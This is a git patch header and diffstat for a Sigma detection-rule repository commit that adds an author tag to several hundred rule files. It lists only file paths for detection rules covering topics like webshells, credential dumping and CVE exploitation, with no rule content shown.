From 7c38a5c4966d8088576a324397c1c4ab037df17c Mon Sep 17 00:00:00 2001 
From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com>
Date: Wed, 1 Feb 2023 11:14:59 +0100
Subject: [PATCH 1/3] chore: add nextron authors tag
---
 other/godmode_sigma_rule.yml | 2 +-
 .../windows/file_event_win_hktl_createminidump.yml | 2 +-
 rules-deprecated/windows/posh_ps_invoke_nightmare.yml | 2 +-
 rules-deprecated/windows/powershell_suspicious_download.yml | 2 +-
 .../windows/powershell_suspicious_invocation_generic.yml | 2 +-
 .../windows/powershell_suspicious_invocation_specific.yml | 2 +-
 .../windows/proc_creation_win_mavinject_proc_inj.yml | 2 +-
 ...c_creation_win_powershell_base64_invoke_susp_cmdlets.yml | 2 +-
 ...oc_creation_win_powershell_base64_listing_shadowcopy.yml | 2 +-
 .../windows/proc_creation_win_renamed_powershell.yml | 2 +-
 .../windows/proc_creation_win_renamed_psexec.yml | 2 +-
 .../windows/proc_creation_win_renamed_rundll32.yml | 2 +-
 rules-deprecated/windows/registry_set_silentprocessexit.yml | 2 +-
 rules-deprecated/windows/win_susp_esentutl_activity.yml | 2 +-
 .../windows/win_susp_vssadmin_ntds_activity.yml | 2 +-
 .../builtin/security/win_susp_interactive_logons.yml | 2 +-
 rules-unsupported/win_mal_service_installs.yml | 2 +-
 rules/category/antivirus/av_exploiting.yml | 2 +-
 rules/category/antivirus/av_hacktool.yml | 2 +-
 rules/category/antivirus/av_password_dumper.yml | 2 +-
 rules/category/antivirus/av_ransomware.yml | 2 +-
 rules/category/antivirus/av_relevant_files.yml | 2 +-
 rules/category/antivirus/av_webshell.yml | 2 +-
 rules/linux/auditd/lnx_auditd_coinminer.yml | 2 +-
 rules/linux/auditd/lnx_auditd_susp_c2_commands.yml | 6 +++---
 rules/linux/auditd/lnx_auditd_susp_cmds.yml | 2 +-
 rules/linux/auditd/lnx_auditd_susp_exe_folders.yml | 4 ++--
 .../auth/lnx_auth_susp_failed_logons_single_source.yml | 2 +-
 rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml | 2 +-
 .../builtin/guacamole/lnx_guacamole_susp_guacamole.yml | 2 +-
 rules/linux/builtin/lnx_apt_equationgroup_lnx.yml | 2 +- 
rules/linux/builtin/lnx_buffer_overflows.yml | 2 +-
 rules/linux/builtin/lnx_clear_syslog.yml | 2 +-
 rules/linux/builtin/lnx_ldso_preload_injection.yml | 2 +-
 rules/linux/builtin/lnx_shell_susp_commands.yml | 2 +-
 rules/linux/builtin/lnx_shell_susp_log_entries.yml | 2 +-
 rules/linux/builtin/lnx_shell_susp_rev_shells.yml | 2 +-
 rules/linux/builtin/lnx_shellshock.yml | 2 +-
 rules/linux/builtin/lnx_susp_jexboss.yml | 2 +-
 rules/linux/builtin/lnx_symlink_etc_passwd.yml | 2 +-
 rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml | 2 +-
 rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml | 2 +-
 rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml | 2 +-
 rules/linux/builtin/syslog/lnx_syslog_susp_named.yml | 2 +-
 .../linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml | 2 +-
 .../file_event/file_event_lnx_persistence_sudoers_files.yml | 2 +-
 .../file_event_lnx_triple_cross_rootkit_lock_file.yml | 2 +-
 .../file_event_lnx_triple_cross_rootkit_persistence.yml | 2 +-
 .../net_connection_lnx_back_connect_shell_dev.yml | 2 +-
 .../net_connection_lnx_crypto_mining_indicators.yml | 2 +-
 .../network_connection/net_connection_lnx_ngrok_tunnel.yml | 2 +-
 .../process_creation/proc_creation_lnx_base64_execution.yml | 2 +-
 .../proc_creation_lnx_base64_shebang_cli.yml | 2 +-
 .../proc_creation_lnx_bpf_kprob_tracing_enabled.yml | 2 +-
 .../process_creation/proc_creation_lnx_capa_discovery.yml | 2 +-
 .../process_creation/proc_creation_lnx_cat_sudoers.yml | 2 +-
 .../proc_creation_lnx_chattr_immutable_removal.yml | 2 +-
 .../process_creation/proc_creation_lnx_clear_syslog.yml | 2 +-
 .../process_creation/proc_creation_lnx_crontab_removal.yml | 2 +-
 .../process_creation/proc_creation_lnx_crypto_mining.yml | 2 +-
 .../linux/process_creation/proc_creation_lnx_curl_usage.yml | 2 +-
 ...roc_creation_lnx_cve_2022_26134_atlassian_confluence.yml | 2 +-
 ...ion_lnx_cve_2022_33891_spark_shell_command_injection.yml | 2 +-
 .../process_creation/proc_creation_lnx_gtfobin_apt.yml | 2 +- 
.../process_creation/proc_creation_lnx_gtfobin_vim.yml | 2 +-
 .../linux/process_creation/proc_creation_lnx_hack_tools.yml | 2 +-
 .../proc_creation_lnx_install_suspicioua_packages.yml | 2 +-
 .../proc_creation_lnx_services_stop_and_disable.yml | 2 +-
 .../proc_creation_lnx_sudo_cve_2019_14287.yml | 2 +-
 .../proc_creation_lnx_susp_curl_fileupload.yml | 2 +-
 .../proc_creation_lnx_susp_curl_useragent.yml | 2 +-
 .../proc_creation_lnx_susp_find_execution.yml | 2 +-
 .../process_creation/proc_creation_lnx_susp_git_clone.yml | 2 +-
 .../proc_creation_lnx_susp_history_delete.yml | 2 +-
 .../proc_creation_lnx_susp_history_recon.yml | 2 +-
 .../proc_creation_lnx_susp_interactive_bash.yml | 2 +-
 .../proc_creation_lnx_susp_java_children.yml | 2 +-
 .../process_creation/proc_creation_lnx_susp_pipe_shell.yml | 2 +-
 .../proc_creation_lnx_susp_recon_indicators.yml | 2 +-
 ...proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml | 2 +-
 .../proc_creation_lnx_triple_cross_rootkit_install.yml | 2 +-
 .../proc_creation_lnx_webshell_detection.yml | 2 +-
 .../proc_creation_macos_creds_from_keychain.yml | 2 +-
 .../proc_creation_macos_susp_find_execution.yml | 2 +-
 .../dns/net_dns_external_service_interaction_domains.yml | 2 +-
 rules/network/dns/net_dns_mal_cobaltstrike.yml | 2 +-
 rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml | 2 +-
 rules/network/dns/net_dns_susp_b64_queries.yml | 2 +-
 rules/network/dns/net_dns_susp_telegram_api.yml | 2 +-
 .../network/firewall/net_firewall_apt_equationgroup_c2.yml | 2 +-
 rules/web/product/apache/web_apache_segfault.yml | 2 +-
 rules/web/product/apache/web_apache_threading_error.yml | 2 +-
 rules/web/product/modsecurity/modsec_mulitple_blocks.yml | 2 +-
 rules/web/proxy_generic/proxy_apt_domestic_kitten.yml | 2 +-
 rules/web/proxy_generic/proxy_baby_shark.yml | 2 +-
 rules/web/proxy_generic/proxy_chafer_malware.yml | 2 +-
 rules/web/proxy_generic/proxy_cobalt_malformed_uas.yml | 2 +-
 rules/web/proxy_generic/proxy_download_susp_dyndns.yml | 2 +- 
.../proxy_generic/proxy_download_susp_tlds_blacklist.yml | 2 +-
 .../proxy_generic/proxy_download_susp_tlds_whitelist.yml | 2 +-
 rules/web/proxy_generic/proxy_downloadcradle_webdav.yml | 2 +-
 rules/web/proxy_generic/proxy_empire_ua_uri_combos.yml | 2 +-
 rules/web/proxy_generic/proxy_empty_ua.yml | 2 +-
 .../proxy_generic/proxy_exchange_owassrf_exploitation.yml | 2 +-
 .../proxy_exchange_owassrf_poc_exploitation.yml | 2 +-
 rules/web/proxy_generic/proxy_ios_implant.yml | 2 +-
 rules/web/proxy_generic/proxy_powershell_ua.yml | 2 +-
 rules/web/proxy_generic/proxy_pwndrop.yml | 2 +-
 rules/web/proxy_generic/proxy_raw_paste_service_access.yml | 2 +-
 rules/web/proxy_generic/proxy_susp_flash_download_loc.yml | 2 +-
 rules/web/proxy_generic/proxy_telegram_api.yml | 2 +-
 rules/web/proxy_generic/proxy_turla_comrat.yml | 2 +-
 rules/web/proxy_generic/proxy_ua_apt.yml | 2 +-
 rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml | 2 +-
 rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml | 2 +-
 rules/web/proxy_generic/proxy_ua_cryptominer.yml | 2 +-
 rules/web/proxy_generic/proxy_ua_frameworks.yml | 2 +-
 rules/web/proxy_generic/proxy_ua_hacktool.yml | 2 +-
 rules/web/proxy_generic/proxy_ua_malware.yml | 2 +-
 rules/web/proxy_generic/proxy_ua_susp.yml | 2 +-
 rules/web/proxy_generic/proxy_ua_susp_base64.yml | 2 +-
 rules/web/webserver_generic/web_cve_2014_6287_hfs_rce.yml | 2 +-
 .../web_cve_2018_2894_weblogic_exploit.yml | 2 +-
 .../web_cve_2019_11510_pulsesecure_exploit.yml | 2 +-
 .../web/webserver_generic/web_cve_2019_3398_confluence.yml | 2 +-
 .../web/webserver_generic/web_cve_2020_0688_msexchange.yml | 2 +-
 .../web_cve_2020_14882_weblogic_exploit.yml | 2 +-
 .../webserver_generic/web_cve_2020_3452_cisco_asa_ftd.yml | 2 +-
 rules/web/webserver_generic/web_cve_2020_5902_f5_bigip.yml | 2 +-
 .../web_cve_2020_8193_8195_citrix_exploit.yml | 2 +-
 rules/web/webserver_generic/web_cve_2021_26814_wzuh_rce.yml | 2 +-
 .../web_cve_2021_28480_exchange_exploit.yml | 2 +- 
.../web_cve_2021_33766_msexchange_proxytoken.yml | 2 +-
 .../webserver_generic/web_cve_2021_40539_adselfservice.yml | 2 +-
 .../web_cve_2021_42237_sitecore_report_ashx.yml | 2 +-
 rules/web/webserver_generic/web_cve_2021_43798_grafana.yml | 2 +-
 rules/web/webserver_generic/web_cve_2021_44228_log4j.yml | 2 +-
 .../webserver_generic/web_cve_2021_44228_log4j_fields.yml | 2 +-
 .../webserver_generic/web_cve_2022_31656_auth_bypass.yml | 2 +-
 .../web/webserver_generic/web_cve_2022_31659_vmware_rce.yml | 2 +-
 .../web_cve_2022_33891_spark_shell_command_injection.yml | 2 +-
 ...cve_2022_36804_atlassian_bitbucket_command_injection.yml | 2 +-
 .../web_cve_2022_44877_exploitation_attempt.yml | 2 +-
 .../web_cve_2022_46169_cacti_exploitation_attempt.yml | 2 +-
 .../webserver_generic/web_exchange_exploitation_hafnium.yml | 2 +-
 .../webserver_generic/web_exchange_owassrf_exploitation.yml | 2 +-
 .../web_exchange_owassrf_poc_exploitation.yml | 2 +-
 rules/web/webserver_generic/web_exchange_proxyshell.yml | 2 +-
 .../web_exchange_proxyshell_successful.yml | 2 +-
 rules/web/webserver_generic/web_jndi_exploit.yml | 2 +-
 rules/web/webserver_generic/web_nginx_core_dump.yml | 2 +-
 .../webserver_generic/web_solarwinds_supernova_webshell.yml | 2 +-
 .../webserver_generic/web_sonicwall_jarrewrite_exploit.yml | 2 +-
 rules/web/webserver_generic/web_ssti_in_access_logs.yml | 2 +-
 rules/web/webserver_generic/web_susp_useragents.yml | 2 +-
 rules/web/webserver_generic/web_susp_windows_path_uri.yml | 2 +-
 .../webserver_generic/web_unc2546_dewmode_php_webshell.yml | 2 +-
 .../webserver_generic/web_win_webshells_in_access_logs.yml | 2 +-
 rules/windows/builtin/application/win_audit_cve.yml | 2 +-
 rules/windows/builtin/application/win_av_relevant_match.yml | 2 +-
 .../builtin/application/win_esent_ntdsutil_abuse.yml | 2 +-
 .../application/win_esent_ntdsutil_abuse_susp_location.yml | 2 +-
 .../application/win_msi_install_from_susp_locations.yml | 2 +-
 .../builtin/application/win_mssql_add_sysadmin_account.yml | 2 +- 
.../application/win_mssql_disable_audit_settings.yml | 2 +-
 .../builtin/application/win_mssql_sp_procoption_set.yml | 2 +-
 .../builtin/application/win_mssql_xp_cmdshell_audit_log.yml | 2 +-
 .../builtin/application/win_mssql_xp_cmdshell_change.yml | 2 +-
 .../windows/builtin/application/win_susp_backup_delete.yml | 2 +-
 .../windows/builtin/application/win_susp_msmpeng_crash.yml | 2 +-
 rules/windows/builtin/application/win_vul_cve_2020_0688.yml | 2 +-
 .../windows/builtin/application/win_vul_cve_2021_41379.yml | 2 +-
 .../application/win_werfault_susp_lsass_credential_dump.yml | 2 +-
 ...n_appmodel_runtime_sysinternals_tools_appx_execution.yml | 2 +-
 .../win_appxdeployment_server_mal_appx_names.yml | 2 +-
 ...appxdeployment_server_susp_appx_package_installation.yml | 2 +-
 .../win_appxdeployment_server_susp_domains.yml | 2 +-
 .../win_appxdeployment_server_susp_package_locations.yml | 2 +-
 ...win_appxdeployment_server_uncommon_package_locations.yml | 2 +-
 .../win_appxpackaging_om_sups_appx_signature.yml | 2 +-
 .../bits_client/win_bits_client_direct_ip_access.yml | 2 +-
 .../builtin/bits_client/win_bits_client_susp_domain.yml | 2 +-
 .../bits_client/win_bits_client_susp_local_folder.yml | 2 +-
 .../builtin/bits_client/win_bits_client_uncommon_domain.yml | 2 +-
 .../code_integrity/win_codeintegrity_attempted_dll_load.yml | 2 +-
 .../win_codeintegrity_blocked_driver_load.yml | 2 +-
 .../code_integrity/win_codeintegrity_revoked_driver.yml | 2 +-
 .../scripted/win_diagnosis_scripted_load_remote_diagcab.yml | 2 +-
 .../builtin/dns_client/win_dns_client__mal_cobaltstrike.yml | 2 +-
 .../builtin/dns_client/win_dns_client_anonymfiles_com.yml | 2 +-
 rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml | 2 +-
 .../windows/builtin/dns_client/win_dns_client_tor_onion.yml | 2 +-
 .../windows/builtin/dns_client/win_dns_client_ufile_io.yml | 2 +-
 .../builtin/dns_server/win_dns_server_susp_dns_config.yml | 2 +-
 .../builtin/driverframeworks/win_usb_device_plugged.yml | 2 +- 
.../builtin/msexchange/win_exchange_cve_2021_42321.yml | 2 +-
 .../msexchange/win_exchange_proxylogon_oabvirtualdir.yml | 2 +-
 .../win_exchange_proxyshell_certificate_generation.yml | 2 +-
 .../msexchange/win_exchange_proxyshell_mailbox_export.yml | 2 +-
 .../win_exchange_proxyshell_remove_mailbox_export.yml | 2 +-
 .../builtin/msexchange/win_exchange_transportagent.yml | 2 +-
 .../msexchange/win_exchange_transportagent_failed.yml | 2 +-
 rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml | 2 +-
 .../printservice/win_exploit_cve_2021_1675_printspooler.yml | 2 +-
 .../win_exploit_cve_2021_1675_printspooler_operational.yml | 2 +-
 .../builtin/security/win_security_admin_share_access.yml | 2 +-
 rules/windows/builtin/security/win_security_alert_ruler.yml | 2 +-
 .../security/win_security_apt_chafer_mar18_security.yml | 2 +-
 .../windows/builtin/security/win_security_apt_slingshot.yml | 2 +-
 rules/windows/builtin/security/win_security_apt_wocao.yml | 2 +-
 .../security/win_security_cobaltstrike_service_installs.yml | 2 +-
 rules/windows/builtin/security/win_security_dcsync.yml | 2 +-
 .../win_security_diagtrack_eop_default_login_username.yml | 2 +-
 .../builtin/security/win_security_hidden_user_creation.yml | 2 +-
 .../builtin/security/win_security_mal_creddumper.yml | 2 +-
 .../builtin/security/win_security_mal_service_installs.yml | 2 +-
 .../builtin/security/win_security_net_ntlm_downgrade.yml | 2 +-
 .../security/win_security_rare_schtasks_creations.yml | 2 +-
 .../security/win_security_rdp_bluekeep_poc_scanner.yml | 2 +-
 .../win_security_samaccountname_spoofing_cve_2021_42287.yml | 2 +-
 .../builtin/security/win_security_susp_eventlog_cleared.yml | 2 +-
 .../security/win_security_susp_failed_logon_reasons.yml | 2 +-
 .../win_security_susp_failed_logons_single_source.yml | 2 +-
 .../win_security_susp_failed_logons_single_source2.yml | 2 +-
 .../security/win_security_susp_kerberos_manipulation.yml | 2 +-
 .../security/win_security_susp_logon_newcredentials.yml | 2 +- 
.../security/win_security_susp_net_recon_activity.yml | 2 +-
 .../security/win_security_susp_opened_encrypted_zip.yml | 2 +-
 .../win_security_susp_opened_encrypted_zip_filename.yml | 2 +-
 .../win_security_susp_opened_encrypted_zip_outlook.yml | 2 +-
 .../win_security_susp_possible_shadow_credentials_added.yml | 2 +-
 .../builtin/security/win_security_susp_rc4_kerberos.yml | 2 +-
 .../security/win_security_susp_scheduled_task_creation.yml | 2 +-
 .../security/win_security_susp_scheduled_task_delete.yml | 2 +-
 .../security/win_security_susp_scheduled_task_update.yml | 2 +-
 .../win_security_user_added_to_local_administrators.yml | 2 +-
 .../builtin/security/win_security_wmi_persistence.yml | 2 +-
 ...security_mitigations_unsigned_dll_from_susp_location.yml | 2 +-
 .../shell_core/win_shell_core_susp_packages_installed.yml | 2 +-
 .../builtin/smbclient/win_susp_failed_guest_logon.yml | 2 +-
 .../builtin/system/win_system_apt_carbonpaper_turla.yml | 2 +-
 .../builtin/system/win_system_apt_chafer_mar18_system.yml | 2 +-
 rules/windows/builtin/system/win_system_apt_stonedrill.yml | 2 +-
 .../builtin/system/win_system_apt_turla_service_png.yml | 2 +-
 .../system/win_system_cobaltstrike_service_installs.yml | 2 +-
 .../windows/builtin/system/win_system_eventlog_cleared.yml | 2 +-
 .../builtin/system/win_system_kdcsvc_rc4_downgrade.yml | 2 +-
 .../builtin/system/win_system_lpe_indicators_tabtip.yml | 2 +-
 rules/windows/builtin/system/win_system_mal_creddumper.yml | 2 +-
 .../windows/builtin/system/win_system_ntfs_vuln_exploit.yml | 2 +-
 ...win_system_quarkspwdump_clearing_hive_access_history.yml | 2 +-
 .../builtin/system/win_system_rare_service_installs.yml | 2 +-
 .../builtin/system/win_system_service_install_anydesk.yml | 2 +-
 .../builtin/system/win_system_service_install_hacktools.yml | 2 +-
 .../system/win_system_service_install_mesh_agent.yml | 2 +-
 .../win_system_service_install_netsupport_manager.yml | 2 +-
 .../builtin/system/win_system_service_install_paexec.yml | 2 +- 
.../builtin/system/win_system_service_install_pdqdeploy.yml | 2 +-
 .../system/win_system_service_install_pdqdeploy_runner.yml | 2 +-
 .../system/win_system_service_install_remote_utilities.yml | 2 +-
 .../builtin/system/win_system_service_install_sliver.yml | 2 +-
 .../win_system_service_install_susp_double_ampersand.yml | 2 +-
 .../system/win_system_service_install_tacticalrmm.yml | 2 +-
 .../builtin/system/win_system_susp_eventlog_cleared.yml | 2 +-
 .../windows/builtin/system/win_system_susp_proceshacker.yml | 2 +-
 .../system/win_system_susp_rtcore64_service_install.yml | 2 +-
 rules/windows/builtin/system/win_system_susp_sam_dump.yml | 2 +-
 .../builtin/system/win_system_susp_service_installation.yml | 2 +-
 .../system/win_system_susp_service_installation_folder.yml | 2 +-
 .../win_system_susp_service_installation_folder_pattern.yml | 2 +-
 .../system/win_system_susp_service_installation_script.yml | 2 +-
 .../win_taskscheduler_rare_schtask_creation.yml | 2 +-
 .../taskscheduler/win_taskscheduler_susp_task_locations.yml | 2 +-
 .../terminalservices/win_terminalservices_rdp_ngrok.yml | 2 +-
 rules/windows/builtin/win_alert_mimikatz_keywords.yml | 2 +-
 rules/windows/builtin/windefend/win_defender_exclusions.yml | 2 +-
 .../builtin/windefend/win_defender_exploit_guard_tamper.yml | 2 +-
 .../windefend/win_defender_restored_quarantine_file.yml | 2 +-
 .../win_defender_suspicious_features_tampering.yml | 2 +-
 rules/windows/builtin/wmi/win_wmi_persistence.yml | 2 +-
 .../create_remote_thread_win_bumblebee.yml | 2 +-
 ...ate_remote_thread_win_cobaltstrike_process_injection.yml | 2 +-
 .../create_remote_thread_win_susp_powershell_rundll32.yml | 2 +-
 .../create_remote_thread_win_susp_remote_thread_target.yml | 2 +-
 .../create_remote_thread_win_susp_targets.yml | 2 +-
 .../create_stream_hash_ads_executable.yml | 2 +-
 .../create_stream_hash_hacktool_download.yml | 2 +-
 .../create_stream_hash_susp_domain_ext_combo.yml | 2 +-
 .../create_stream_hash_susp_domain_ext_combo_med.yml | 2 +- 
.../create_stream_hash_susp_ip_domains.yml | 2 +-
 rules/windows/dns_query/dns_query_win_anonymfiles_com.yml | 2 +-
 rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml | 2 +-
 rules/windows/dns_query/dns_query_win_susp_teamviewer.yml | 2 +-
 .../windows/driver_load/driver_load_win_mal_creddumper.yml | 2 +-
 .../driver_load/driver_load_win_mal_poortry_driver.yml | 2 +-
 .../windows/driver_load/driver_load_win_process_hacker.yml | 2 +-
 rules/windows/driver_load/driver_load_win_susp_temp_use.yml | 2 +-
 .../driver_load_win_vuln_avast_anti_rootkit_driver.yml | 2 +-
 .../driver_load/driver_load_win_vuln_dell_driver.yml | 2 +-
 rules/windows/driver_load/driver_load_win_vuln_drivers.yml | 2 +-
 .../driver_load/driver_load_win_vuln_drivers_names.yml | 2 +-
 .../driver_load/driver_load_win_vuln_gigabyte_driver.yml | 2 +-
 .../driver_load/driver_load_win_vuln_hevd_driver.yml | 2 +-
 .../windows/driver_load/driver_load_win_vuln_hw_driver.yml | 2 +-
 .../driver_load/driver_load_win_vuln_lenovo_driver.yml | 2 +-
 .../driver_load/driver_load_win_vuln_winring0_driver.yml | 2 +-
 rules/windows/driver_load/driver_load_win_windivert.yml | 2 +-
 .../file_access_win_credential_manager_stealing.yml | 2 +-
 .../file_access/file_access_win_dpapi_master_key_access.yml | 2 +-
 .../file_access/file_access_win_susp_cred_hist_access.yml | 2 +-
 .../file_delete_win_exchange_powershell_logs.yml | 2 +-
 .../file_event_win_anydesk_writing_susp_binaries.yml | 2 +-
 .../file_event/file_event_win_crackmapexec_patterns.yml | 2 +-
 .../file_event/file_event_win_create_non_existent_dlls.yml | 2 +-
 .../file_event_win_cve_2021_1675_printspooler.yml | 2 +-
 .../file_event/file_event_win_cve_2021_41379_msi_lpe.yml | 2 +-
 .../file_event_win_cve_2021_44077_poc_default_files.yml | 2 +-
 .../file/file_event/file_event_win_cve_2022_24527_lpe.yml | 2 +-
 .../file_event_win_error_handler_cmd_persistence.yml | 2 +-
 .../file_event/file_event_win_exchange_webshell_drop.yml | 2 +- 
.../file_event_win_exchange_webshell_drop_suspicious.yml | 2 +-
 .../windows/file/file_event/file_event_win_hack_dumpert.yml | 2 +-
 .../file_event_win_hivenightmare_file_exports.yml | 2 +-
 .../windows/file/file_event/file_event_win_hktl_nppspy.yml | 2 +-
 .../file/file_event/file_event_win_inveigh_artefacts.yml | 2 +-
 .../file/file_event/file_event_win_iso_file_recent.yml | 2 +-
 rules/windows/file/file_event/file_event_win_lsass_dump.yml | 2 +-
 .../file/file_event/file_event_win_lsass_werfault_dump.yml | 2 +-
 rules/windows/file/file_event/file_event_win_mal_adwind.yml | 2 +-
 .../file_event_win_mimikatz_kirbi_file_creation.yml | 2 +-
 .../file_event_win_new_files_in_uncommon_appdata_folder.yml | 2 +-
 .../file_event_win_notepad_plus_plus_persistence.yml | 2 +-
 rules/windows/file/file_event/file_event_win_ntds_dit.yml | 2 +-
 .../file/file_event/file_event_win_ntds_exfil_tools.yml | 2 +-
 ...file_event_win_one_extension_files_in_susp_locations.yml | 2 +-
 .../file/file_event/file_event_win_outlook_newform.yml | 2 +-
 .../file_event_win_powershell_exploit_scripts.yml | 2 +-
 .../file/file_event/file_event_win_psexec_service_key.yml | 2 +-
 .../file/file_event/file_event_win_quarkspw_filedump.yml | 2 +-
 rules/windows/file/file_event/file_event_win_sam_dump.yml | 2 +-
 .../file_event_win_shell_write_susp_directory.yml | 2 +-
 .../file_event_win_shell_write_susp_files_extensions.yml | 2 +-
 .../file_event_win_susp_desktopimgdownldr_file.yml | 2 +-
 .../file_event/file_event_win_susp_double_extension.yml | 2 +-
 .../file_event/file_event_win_susp_exchange_aspx_write.yml | 2 +-
 .../file_event/file_event_win_susp_lnk_double_extension.yml | 2 +-
 .../file/file_event/file_event_win_susp_ntds_dit.yml | 2 +-
 .../file_event_win_susp_spool_drivers_color_drop.yml | 2 +-
 .../file_event_win_susp_startup_folder_persistence.yml | 2 +-
 .../file_event_win_susp_system_interactive_powershell.yml | 2 +-
 .../file/file_event/file_event_win_susp_task_write.yml | 2 +- 
.../file_event_win_susp_teamviewer_remote_session.yml | 2 +-
 .../file_event_win_susp_vscode_powershell_profile.yml | 2 +-
 ...event_win_system32_local_folder_privilege_escalation.yml | 2 +-
 .../file_event_win_uac_bypass_consent_comctl32.yml | 2 +-
 .../file_event_win_uac_bypass_dotnet_profiler.yml | 2 +-
 .../file/file_event/file_event_win_uac_bypass_eventvwr.yml | 2 +-
 .../file_event_win_uac_bypass_idiagnostic_profile.yml | 2 +-
 .../file/file_event/file_event_win_uac_bypass_ieinstal.yml | 2 +-
 .../file_event/file_event_win_uac_bypass_msconfig_gui.yml | 2 +-
 .../file_event_win_uac_bypass_ntfs_reparse_point.yml | 2 +-
 .../file/file_event/file_event_win_uac_bypass_winsat.yml | 2 +-
 .../file/file_event/file_event_win_uac_bypass_wmp.yml | 2 +-
 .../file_event/file_event_win_winword_cve_2021_40444.yml | 2 +-
 .../file_event/file_event_win_wmiexec_default_filename.yml | 2 +-
 .../file_event/file_event_win_word_template_creation.yml | 2 +-
 .../file/file_event/file_event_win_wpbbin_persistence.yml | 2 +-
 rules/windows/image_load/image_load_foggyweb_nobelium.yml | 2 +-
 .../image_load_rundll32_loading_renamed_comsvcs.yml | 2 +-
 rules/windows/image_load/image_load_side_load_antivirus.yml | 2 +-
 ...oad_side_load_aruba_networks_virtual_intranet_access.yml | 2 +-
 rules/windows/image_load/image_load_side_load_comctl32.yml | 2 +-
 .../windows/image_load/image_load_side_load_dbgcore_dll.yml | 2 +-
 .../windows/image_load/image_load_side_load_dbghelp_dll.yml | 2 +-
 .../image_load_side_load_from_non_system_location.yml | 2 +-
 .../image_load/image_load_side_load_non_existent_dlls.yml | 2 +-
 .../windows/image_load/image_load_side_load_office_dlls.yml | 2 +-
 rules/windows/image_load/image_load_side_load_scm.yml | 2 +-
 .../windows/image_load/image_load_side_load_third_party.yml | 2 +-
 .../windows/image_load/image_load_side_load_vmguestlib.yml | 2 +-
 .../image_load/image_load_side_load_web_browsers.yml | 2 +-
 rules/windows/image_load/image_load_susp_cmstp.yml | 2 +- 
.../image_load/image_load_susp_dll_load_system_process.yml | 2 +-
 .../image_load/image_load_sysmon_disable_sharpevtmute.yml | 2 +-
 rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml | 2 +-
 rules/windows/image_load/image_load_usp_svchost_clfsw32.yml | 2 +-
 ...image_load_vmware_xfer_load_dll_from_nondefault_path.yml | 2 +-
 .../net_connection_win_binary_github_com.yml | 2 +-
 .../net_connection_win_binary_susp_com.yml | 2 +-
 .../network_connection/net_connection_win_crypto_mining.yml | 2 +-
 .../network_connection/net_connection_win_eqnedt.yml | 2 +-
 rules/windows/network_connection/net_connection_win_hh.yml | 2 +-
 .../net_connection_win_malware_backconnect_ports.yml | 2 +-
 .../network_connection/net_connection_win_mega_nz.yml | 2 +-
 .../network_connection/net_connection_win_ngrok_io.yml | 2 +-
 .../network_connection/net_connection_win_ngrok_tunnel.yml | 2 +-
 .../net_connection_win_powershell_network_connection.yml | 2 +-
 .../network_connection/net_connection_win_rdp_to_http.yml | 2 +-
 .../net_connection_win_rundll32_net_connections.yml | 2 +-
 .../net_connection_win_susp_binary_no_cmdline.yml | 2 +-
 .../network_connection/net_connection_win_susp_cmstp.yml | 2 +-
 .../net_connection_win_susp_dropbox_api.yml | 2 +-
 ...connection_win_susp_prog_location_network_connection.yml | 2 +-
 .../pipe_created_diagtrack_eop_default_pipe.yml | 2 +-
 .../pipe_created/pipe_created_efspotato_namedpipe.yml | 2 +-
 .../windows/pipe_created/pipe_created_koh_default_pipe.yml | 2 +-
 .../windows/pipe_created/pipe_created_mal_cobaltstrike.yml | 2 +-
 .../pipe_created/pipe_created_mal_cobaltstrike_re.yml | 2 +-
 rules/windows/pipe_created/pipe_created_mal_namedpipes.yml | 2 +-
 .../pipe_created/pipe_created_paexec_default_pipe.yml | 2 +-
 .../pipe_created_psexec_default_pipe_from_susp_location.yml | 2 +-
 .../pipe_created_susp_cobaltstrike_pipe_patterns.yml | 2 +-
 .../pipe_created_susp_wmi_consumer_namedpipe.yml | 2 +-
 .../powershell_classic/posh_pc_downgrade_attack.yml | 2 +- 
.../powershell_classic/posh_pc_exe_calling_ps.yml | 2 +-
 .../powershell/powershell_classic/posh_pc_susp_download.yml | 2 +-
 .../posh_pm_active_directory_module_dll_import.yml | 2 +-
 .../powershell_module/posh_pm_get_addbaccount.yml | 2 +-
 .../powershell_module/posh_pm_malicious_commandlets.yml | 2 +-
 .../powershell/powershell_module/posh_pm_susp_download.yml | 2 +-
 .../powershell_module/posh_pm_susp_invocation_generic.yml | 2 +-
 .../powershell_module/posh_pm_susp_invocation_specific.yml | 2 +-
 .../posh_ps_aadinternals_cmdlets_execution.yml | 2 +-
 .../powershell_script/posh_ps_add_windows_capability.yml | 2 +-
 .../powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml | 2 +-
 .../powershell_script/posh_ps_amsi_null_bits_bypass.yml | 2 +-
 .../powershell_script/posh_ps_audio_exfiltration.yml | 2 +-
 .../posh_ps_computer_discovery_get_adcomputer.yml | 2 +-
 .../powershell_script/posh_ps_etw_trace_evasion.yml | 2 +-
 .../posh_ps_exchange_mailbox_smpt_forwarding_rule.yml | 2 +-
 .../powershell/powershell_script/posh_ps_hotfix_enum.yml | 2 +-
 .../powershell_script/posh_ps_import_module_susp_dirs.yml | 2 +-
 .../powershell_script/posh_ps_mailboxexport_share.yml | 2 +-
 .../powershell_script/posh_ps_malicious_commandlets.yml | 2 +-
 .../powershell_script/posh_ps_malicious_keywords.yml | 2 +-
 .../posh_ps_memorydump_getstoragediagnosticinfo.yml | 2 +-
 .../powershell_script/posh_ps_prompt_credentials.yml | 2 +-
 .../powershell/powershell_script/posh_ps_psasyncshell.yml | 2 +-
 .../powershell/powershell_script/posh_ps_psattack.yml | 2 +-
 .../powershell/powershell_script/posh_ps_shellcode_b64.yml | 2 +-
 .../posh_ps_shellintel_malicious_commandlets.yml | 2 +-
 .../powershell_script/posh_ps_susp_ace_tampering.yml | 2 +-
 .../powershell_script/posh_ps_susp_alias_obfscuation.yml | 2 +-
